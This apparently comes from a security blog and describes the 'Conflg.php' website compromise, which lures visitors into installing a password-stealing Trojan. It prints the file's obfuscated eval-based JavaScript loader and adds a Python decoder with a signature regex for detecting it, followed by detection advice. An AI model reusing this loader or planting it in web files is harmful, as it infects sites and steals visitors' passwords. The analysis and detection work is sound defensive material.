One of the latest attacks we are tracking on the Internet has already infected about 250 websites at the time of our post, and this number is growing rapidly. We will be posting more details regarding the Conflg.php Hack and the reason it is infecting benign websites in our forthcoming posts.
What is the purpose of the Conflg.php Hack?
This particular attack creates a file called “Conflg.php” in the user’s hosting account. These malicious hackers apparently named the file “Conflg.php” in the hope that the name looks similar to the “config.php” file found in WordPress installations and many other CMS packages. In most cases, the goal of the website infection is to prompt visitors to install a password-stealing Trojan onto their PCs.
The password stealing Trojan is loaded from sites including the following:
The malware contained in Conflg.php looks like the following:
var s=new String();try{document[0][1]}catch(q){if(q)r=1;c=String;}if(r&&document.createTextNode)y=2;e=eval;m=[4.5*y,18/y,52.5*y,204/y,16*y,80/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,20.5*y,246/y,4.5*y,18/y,4.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,228/y,20*y,82/y,29.5*y,18/y,4.5*y,250/y,16*y,202/y,54*y,230/y,50.5*y,64/y,61.5*y,18/y,4.5*y,18/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,238/y,57*y,210/y,58*y,202/y,20*y[snipped],mm=c['fro'+'mCharCode'];for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{document.appendChild(null)}catch(q){e(s);}
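As an added example (not code from the original post), the following Python decoder recovers the string that the loader above assembles and hands to eval, without running any of it, and carries a signature check for the loader pattern. The embedded sample is the page's snippet cut off where the page elides it with [snipped], with the array closed so it parses; the fixed y=2 reflects the branch the script takes in a real browser.

```python
import re

# Loader script as it appears in Conflg.php, copied from the page up to the
# point where the page elides the rest of the array with [snipped]; the array
# is closed here so the sample parses. Everything else is as on the page.
CONFLG_SAMPLE = (
    "var s=new String();try{document[0][1]}catch(q){if(q)r=1;c=String;}"
    "if(r&&document.createTextNode)y=2;e=eval;m=["
    "4.5*y,18/y,52.5*y,204/y,16*y,80/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,"
    "55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,"
    "220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,"
    "80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,"
    "20.5*y,246/y,4.5*y,18/y,4.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,"
    "228/y,20*y,82/y,29.5*y,18/y,4.5*y,250/y,16*y,202/y,54*y,230/y,50.5*y,"
    "64/y,61.5*y,18/y,4.5*y,18/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,"
    "232/y,23*y,238/y,57*y,210/y,58*y,202/y,20*y],mm=c['fro'+'mCharCode'];"
    "for(i=0;i!=m.length;i++)s+=mm(e(\"m\"+\"[\"+\"i\"+']'));"
    "try{document.appendChild(null)}catch(q){e(s);}"
)

ARRAY_RE = re.compile(r"m=\[([^\]]*)\]")
TERM_RE = re.compile(r"^(\d+(?:\.\d+)?)([*/])y$")
# Two traits of this loader: the split 'fro'+'mCharCode' and a long run of
# `<number>*y,<number>/y` terms. Either one is enough to flag a file.
LOADER_RE = re.compile(r"fro'\s*\+\s*'mCharCode|(?:\d+(?:\.\d+)?[*/]y,){8,}")


def looks_like_conflg_loader(text):
    """Signature check for the loader pattern, usable on any file's contents."""
    return LOADER_RE.search(text) is not None


def decode_conflg_payload(text, y=2):
    """Statically evaluate the m=[...] array and return the decoded string.
    The script only sets y=2 when document.createTextNode exists, so a
    non-browser engine that ran it would get NaN; we substitute y directly."""
    m = ARRAY_RE.search(text)
    if m is None:
        raise ValueError("no m=[...] array found")
    out = []
    for term in m.group(1).split(","):
        t = TERM_RE.match(term.strip())
        if t is None:
            raise ValueError("unexpected term: %r" % term)
        num, op = float(t.group(1)), t.group(2)
        code = num * y if op == "*" else num / y
        if code != int(code) or not 0 <= code < 0x110000:
            raise ValueError("term %r does not yield a char code" % term)
        out.append(chr(int(code)))
    return "".join(out)


if __name__ == "__main__":
    print(repr(decode_conflg_payload(CONFLG_SAMPLE)))
```

On the visible prefix the decoder yields a script that checks for a body element and then calls iframer() or falls back to document.write(, which is the injection the obfuscation hides.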
Why do malicious hackers use obfuscated filenames?
The primary reason is to confuse the website owner about the legitimacy of the file's contents. Since the owner believes that the file containing the malware code is a legitimate file associated with the software powering the website, when this is in fact not the case, the contents of the file are unlikely to be deleted.
How do I know if my site is infected?
Check your website for the existence of a file named “Conflg.php” or for the contents shown above. Additionally, please be extra vigilant if your website is hosted by SoftLayer or ThePlanet, as the majority of sites with this infection seem to have been hosted there (within their IP blocks).
How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.